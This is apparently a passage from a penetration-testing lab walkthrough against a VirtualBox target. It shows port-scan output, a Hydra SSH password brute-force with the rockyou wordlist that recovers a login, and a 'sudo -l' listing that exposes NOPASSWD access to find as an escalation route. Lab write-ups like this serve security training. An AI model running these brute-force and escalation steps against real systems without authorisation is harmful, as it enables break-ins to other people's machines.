[~] The config file is expected to be at "/root/.rustscan.toml" [!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers [!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. Open 192.168.100.57:22 Open 192.168.100.57:80 [~] Starting Script(s) [~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-10 03:53 EDT Initiating ARP Ping Scan at 03:53 Scanning 192.168.100.57 [1 port] Completed ARP Ping Scan at 03:53, 0.04s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 03:53 Completed Parallel DNS resolution of 1 host. at 03:53, 0.22s elapsed DNS resolution of 1 IPs took 0.22s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating SYN Stealth Scan at 03:53 Scanning 192.168.100.57 [2 ports] Discovered open port 22/tcp on 192.168.100.57 Discovered open port 80/tcp on 192.168.100.57 Completed SYN Stealth Scan at 03:53, 0.02s elapsed (2 total ports) Nmap scan report for 192.168.100.57 Host is up, received arp-response (0.00081s latency). Scanned at 2026-04-10 03:53:05 EDT for 0s
PORT STATE SERVICE REASON 22/tcp open ssh syn-ack ttl 64 80/tcp open http syn-ack ttl 64 MAC Address: 08:00:27:95:BA:EB (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Read data files from: /usr/share/nmap Nmap done: 1 IP address (1 host up) scanned in 0.36 seconds Raw packets sent: 3 (116B) | Rcvd: 3 (116B)
┌──(root㉿kali)-[~] └─# hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.100.57 ssh -t 64 Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-04-10 04:30:56 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 64 tasks per 1 server, overall 64 tasks, 28688798 login tries (l:2/p:14344399), ~448263 tries per task [DATA] attacking ssh://192.168.100.57:22/ [22][ssh] host: 192.168.100.57 login: superadministrator password: princesa
superadministrator:princesa
提权
1 2 3 4 5 6
superadministrator@thehackerslabs-bocatacalamares:~$ sudo -l Matching Defaults entries for superadministrator on thehackerslabs-bocatacalamares: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User superadministrator may run the following commands on thehackerslabs-bocatacalamares: (ALL) NOPASSWD: /usr/bin/find